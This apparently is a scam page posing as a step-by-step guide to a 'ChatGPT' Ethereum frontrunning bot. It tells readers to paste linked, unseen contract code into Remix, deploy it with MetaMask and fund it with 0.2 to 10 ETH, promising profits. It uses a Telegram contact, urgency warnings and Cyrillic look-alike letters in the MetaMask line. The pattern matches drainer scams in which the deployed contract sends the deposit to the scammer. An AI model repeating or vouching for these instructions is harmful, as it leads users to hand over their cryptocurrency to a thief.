Guide

Guide


My Telegram: https://t.me/kylefisherdev

🔗 Click here to access Remix

🔗 Open Source Bot Code [Click Here]


❗️Get Ready❗️

Here are Step-by-Step Guide to Simplify Your Life with ChatGPT:

🟢 Step 1: Download the MetaMask Extension

🔗 -Dоwnlоаd МetаМаsk: https://metamask.io/download


🟢 Step 2: Code Compiler

🔗 Click here to access Remix


🟢 Step 3: Create a New File on Remix

Press the new file button and name it however you'd like (e.g., 'bot.sol'). Make sure the file ends with .sol for Ethereum code.


🟢 Step 4: Paste This Code Into Your New File on Remix

🔗 Open Source Bot Code [Click Here]


🟢 Step 5:

Navigate to the Solidity Compiler tab in Remix and compile your bot. Be sure to select compiler version 0.8.4

⚠️ Tip: If the code doesn't show up with colors, simply refresh the browser and paste the code again.


🟢 Step 6:

Go to the 'Deploy & Run Transactions' tab, choose 'Injected Provider' as your environment, and click Deploy. After confirming the contract creation fee in MetaMask, your contract will be deployed.

⚠️Attention⚠️

If you see an error when you click Deploy

“Gas estimation failed” or “the transaction will likely fail” it means that you do not have enough funds on your main wallet to pay the contract deployment fee

⚠️⚠️⚠️Ensure to manually set the “Aggressive Gas Price” as shown in the video and on the screenshot. This will allow you to avoid any errors and successfully deploy the contract! ⚠️⚠️⚠️

⚠️ Tip: If you get any issues - use a clean Firefox browser and only one MetaMask extension


🟢 Step 7:

Add funds to your bot for transaction frontrunning (always manually set the Aggressive gas option)

⚠️⚠️⚠️ Do not try to test the bot using too low amount - in this case transaction fees will be higher than your profits and the bot will instantly catch Stop Loss and will not start ⚠️⚠️⚠️.

The minimum recommended amount is 0.2 ETH. But I recommend to use 1-10, so that the bot can process more transactions - in this case the profits will be much better.


🟢 Step 8:

Once the transaction is confirmed, click Start to activate the bot. To stop it and withdraw funds, click Withdraw.

(Make sure you have enough ETH in your main wallet (not in your contract address) to pay the gas fee for pressing the Start button.)

⚠️⚠️⚠️Manually set the Aggressive Gas Option again. Otherwise, the transaction may freeze due to high network load and you will get an error. ⚠️⚠️⚠️


🔍 How can I restore the old contract?

Instead of deploying a new contract, simply input the contract's address in the 'At Address' field and press the At Address button.


⚠️ Important: You can only restore access using the same MetaMask account that was used to deploy the contract.


Report Page